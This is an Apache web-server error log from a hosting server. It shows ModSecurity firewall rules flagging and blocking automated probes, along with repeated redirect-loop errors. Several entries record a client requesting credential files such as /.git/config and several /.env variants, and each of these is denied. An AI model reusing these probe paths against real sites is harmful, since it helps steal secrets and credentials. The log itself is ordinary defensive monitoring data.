[Mon May 11 16:44:35.765469 2026] [security2:error] [pid 1411099:tid 1411111] [client 34.147.152.246:53180] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.bender.piregwan-genesis.com"] [uri "/.git/config"] [unique_id "agHrUw-Qm4vhlWBPlMjAYAAAAAs"]
[Mon May 11 16:44:54.039474 2026] [ssl:error] [pid 1411055:tid 1411059] (EAI 2)Name or service not known: [client 51.68.236.72:9569] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 16:44:54.039649 2026] [ssl:error] [pid 1411055:tid 1411059] AH01941: stapling_renew_response: responder error
[Mon May 11 16:45:23.809314 2026] [security2:error] [pid 1411201:tid 1411249] [client 101.32.52.164:32784] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.rentparadise.fr"] [uri "/"] [unique_id "agHrg_y_GXSWIKeli0v51QAAAIM"]
[Mon May 11 16:45:27.890914 2026] [security2:error] [pid 1424905:tid 1424908] [client 101.32.52.164:59210] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.rentparadise.fr"] [uri "/"] [unique_id "agHrh4W8yzYoWG_eyCWfOQAAAUA"], referer: http://www.rentparadise.fr
[Mon May 11 16:45:35.493993 2026] [security2:error] [pid 1416109:tid 1416149] [client 101.32.52.164:34878] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agHrj1V4kyjgo4bQBUhcXgAAANM"], referer: https://www.rentparadise.fr/
[Mon May 11 16:45:55.252250 2026] [autoindex:error] [pid 1424905:tid 1424910] [client 5.255.103.213:57140] AH01276: Cannot serve directory /home/totalcloud/public_html/sitebuilder/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 16:45:55.252897 2026] [core:error] [pid 1424905:tid 1424910] [client 5.255.103.213:57140] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:08.627796 2026] [core:error] [pid 1411201:tid 1411254] [client 5.255.103.213:60100] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:08.628006 2026] [core:error] [pid 1411201:tid 1411254] [client 5.255.103.213:60100] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:23.003355 2026] [core:error] [pid 1411099:tid 1411120] [client 5.255.103.213:60974] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:23.003573 2026] [core:error] [pid 1411099:tid 1411120] [client 5.255.103.213:60974] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:36.693998 2026] [core:error] [pid 1411055:tid 1411065] [client 5.255.103.213:60022] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:36.694279 2026] [core:error] [pid 1411055:tid 1411065] [client 5.255.103.213:60022] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:43.454812 2026] [core:error] [pid 1412074:tid 1412095] [client 5.255.103.213:54054] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:43.454986 2026] [core:error] [pid 1412074:tid 1412095] [client 5.255.103.213:54054] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:43.796419 2026] [security2:error] [pid 1416109:tid 1416142] [client 102.165.0.52:44677] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHr01V4kyjgo4bQBUhcpgAAAMw"], referer: https://www.piregwan-genesis.com/
[Mon May 11 16:46:46.714151 2026] [security2:error] [pid 1411201:tid 1411254] [client 5.255.103.213:54202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sitebuilder.totalcloud.fr"] [uri "/.env.development"] [unique_id "agHr1vy_GXSWIKeli0v6KgAAAIg"]
[Mon May 11 16:46:46.714511 2026] [security2:error] [pid 1411201:tid 1411254] [client 5.255.103.213:54202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sitebuilder.totalcloud.fr"] [uri "/.env.development"] [unique_id "agHr1vy_GXSWIKeli0v6KgAAAIg"]
[Mon May 11 16:46:46.715121 2026] [core:error] [pid 1411201:tid 1411254] [client 5.255.103.213:54202] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:46.717276 2026] [security2:error] [pid 1411201:tid 1411254] [client 5.255.103.213:54202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sitebuilder.totalcloud.fr"] [uri "/index.php"] [unique_id "agHr1vy_GXSWIKeli0v6KgAAAIg"]
[Mon May 11 16:46:46.718865 2026] [security2:error] [pid 1416109:tid 1416129] [client 5.255.103.213:54286] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sitebuilder.totalcloud.fr"] [uri "/app/.env"] [unique_id "agHr1lV4kyjgo4bQBUhcpwAAAMA"]
[Mon May 11 16:46:46.719284 2026] [security2:error] [pid 1416109:tid 1416129] [client 5.255.103.213:54286] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sitebuilder.totalcloud.fr"] [uri "/app/.env"] [unique_id "agHr1lV4kyjgo4bQBUhcpwAAAMA"]
[Mon May 11 16:46:46.720206 2026] [core:error] [pid 1416109:tid 1416129] [client 5.255.103.213:54286] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:46.720469 2026] [security2:error] [pid 1416109:tid 1416129] [client 5.255.103.213:54286] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sitebuilder.totalcloud.fr"] [uri "/index.php"] [unique_id "agHr1lV4kyjgo4bQBUhcpwAAAMA"]
[Mon May 11 16:46:46.725492 2026] [core:error] [pid 1411099:tid 1411101] [client 5.255.103.213:54248] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:46.725517 2026] [core:error] [pid 1411099:tid 1411101] [client 5.255.103.213:54248] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:46.730316 2026] [security2:error] [pid 1424905:tid 1424929] [client 5.255.103.213:54072] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sitebuilder.totalcloud.fr"] [uri "/public/.env"] [unique_id "agHr1oW8yzYoWG_eyCWfjAAAAVU"]
[Mon May 11 16:46:46.730777 2026] [security2:error] [pid 1424905:tid 1424929] [client 5.255.103.213:54072] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sitebuilder.totalcloud.fr"] [uri "/public/.env"] [unique_id "agHr1oW8yzYoWG_eyCWfjAAAAVU"]
[Mon May 11 16:46:46.731478 2026] [core:error] [pid 1424905:tid 1424929] [client 5.255.103.213:54072] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:46.731666 2026] [security2:error] [pid 1424905:tid 1424929] [client 5.255.103.213:54072] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sitebuilder.totalcloud.fr"] [uri "/index.php"] [unique_id "agHr1oW8yzYoWG_eyCWfjAAAAVU"]
[Mon May 11 16:46:46.734550 2026] [security2:error] [pid 1416109:tid 1416150] [client 5.255.103.213:54158] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sitebuilder.totalcloud.fr"] [uri "/.env"] [unique_id "agHr1lV4kyjgo4bQBUhcqAAAANQ"]
[Mon May 11 16:46:46.734932 2026] [security2:error] [pid 1416109:tid 1416150] [client 5.255.103.213:54158] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sitebuilder.totalcloud.fr"] [uri "/.env"] [unique_id "agHr1lV4kyjgo4bQBUhcqAAAANQ"]
[Mon May 11 16:46:46.735229 2026] [security2:error] [pid 1412074:tid 1412078] [client 5.255.103.213:54218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sitebuilder.totalcloud.fr"] [uri "/.env.bak"] [unique_id "agHr1jJnyuKVXoStDha71wAAAEI"]
[Mon May 11 16:46:46.736040 2026] [security2:error] [pid 1412074:tid 1412078] [client 5.255.103.213:54218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sitebuilder.totalcloud.fr"] [uri "/.env.bak"] [unique_id "agHr1jJnyuKVXoStDha71wAAAEI"]
[Mon May 11 16:46:46.736346 2026] [core:error] [pid 1416109:tid 1416150] [client 5.255.103.213:54158] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:46.736214 2026] [security2:error] [pid 1411055:tid 1411074] [client 5.255.103.213:54226] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sitebuilder.totalcloud.fr"] [uri "/.env.old"] [unique_id "agHr1kWKUxpmnkK7zHyELgAAARE"]
[Mon May 11 16:46:46.736516 2026] [security2:error] [pid 1416109:tid 1416150] [client 5.255.103.213:54158] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sitebuilder.totalcloud.fr"] [uri "/index.php"] [unique_id "agHr1lV4kyjgo4bQBUhcqAAAANQ"]
[Mon May 11 16:46:46.737107 2026] [security2:error] [pid 1411055:tid 1411074] [client 5.255.103.213:54226] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sitebuilder.totalcloud.fr"] [uri "/.env.old"] [unique_id "agHr1kWKUxpmnkK7zHyELgAAARE"]
[Mon May 11 16:46:46.738830 2026] [core:error] [pid 1411055:tid 1411074] [client 5.255.103.213:54226] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:46.739018 2026] [security2:error] [pid 1411055:tid 1411074] [client 5.255.103.213:54226] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sitebuilder.totalcloud.fr"] [uri "/index.php"] [unique_id "agHr1kWKUxpmnkK7zHyELgAAARE"]
[Mon May 11 16:46:46.742116 2026] [core:error] [pid 1412074:tid 1412078] [client 5.255.103.213:54218] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:46.744007 2026] [security2:error] [pid 1412074:tid 1412078] [client 5.255.103.213:54218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sitebuilder.totalcloud.fr"] [uri "/index.php"] [unique_id "agHr1jJnyuKVXoStDha71wAAAEI"]
[Mon May 11 16:46:46.803800 2026] [core:error] [pid 1411099:tid 1411110] [client 5.255.103.213:54324] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:46.803830 2026] [core:error] [pid 1411099:tid 1411110] [client 5.255.103.213:54324] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:46.810631 2026] [core:error] [pid 1412074:tid 1412082] [client 5.255.103.213:54138] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:46.810880 2026] [core:error] [pid 1412074:tid 1412082] [client 5.255.103.213:54138] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:48.378487 2026] [core:error] [pid 1411055:tid 1411066] [client 5.255.103.213:54074] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:48.378626 2026] [core:error] [pid 1411055:tid 1411066] [client 5.255.103.213:54074] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:48.378982 2026] [core:error] [pid 1424905:tid 1424916] [client 5.255.103.213:54334] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:48.379111 2026] [core:error] [pid 1424905:tid 1424916] [client 5.255.103.213:54334] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:48.385060 2026] [core:error] [pid 1412074:tid 1412087] [client 5.255.103.213:54152] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:48.385178 2026] [core:error] [pid 1412074:tid 1412087] [client 5.255.103.213:54152] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:49.920466 2026] [core:error] [pid 1424905:tid 1424921] [client 5.255.103.213:54504] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:49.920496 2026] [core:error] [pid 1424905:tid 1424921] [client 5.255.103.213:54504] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:50.223213 2026] [core:error] [pid 1416109:tid 1416143] [client 5.255.103.213:54604] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:50.223359 2026] [core:error] [pid 1416109:tid 1416143] [client 5.255.103.213:54604] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:50.223772 2026] [core:error] [pid 1412074:tid 1412089] [client 5.255.103.213:54592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:50.223962 2026] [core:error] [pid 1412074:tid 1412089] [client 5.255.103.213:54592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:50.224350 2026] [core:error] [pid 1411055:tid 1411059] [client 5.255.103.213:54566] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:50.225239 2026] [core:error] [pid 1411055:tid 1411059] [client 5.255.103.213:54566] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:51.335650 2026] [core:error] [pid 1424905:tid 1424919] [client 5.255.103.213:54380] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:51.335695 2026] [core:error] [pid 1424905:tid 1424919] [client 5.255.103.213:54380] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:51.339135 2026] [core:error] [pid 1411055:tid 1411078] [client 5.255.103.213:54394] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:51.341062 2026] [core:error] [pid 1411055:tid 1411078] [client 5.255.103.213:54394] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:51.383406 2026] [core:error] [pid 1411055:tid 1411058] [client 5.255.103.213:54458] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:51.383738 2026] [core:error] [pid 1411055:tid 1411058] [client 5.255.103.213:54458] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:51.392060 2026] [core:error] [pid 1412074:tid 1412100] [client 5.255.103.213:54600] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
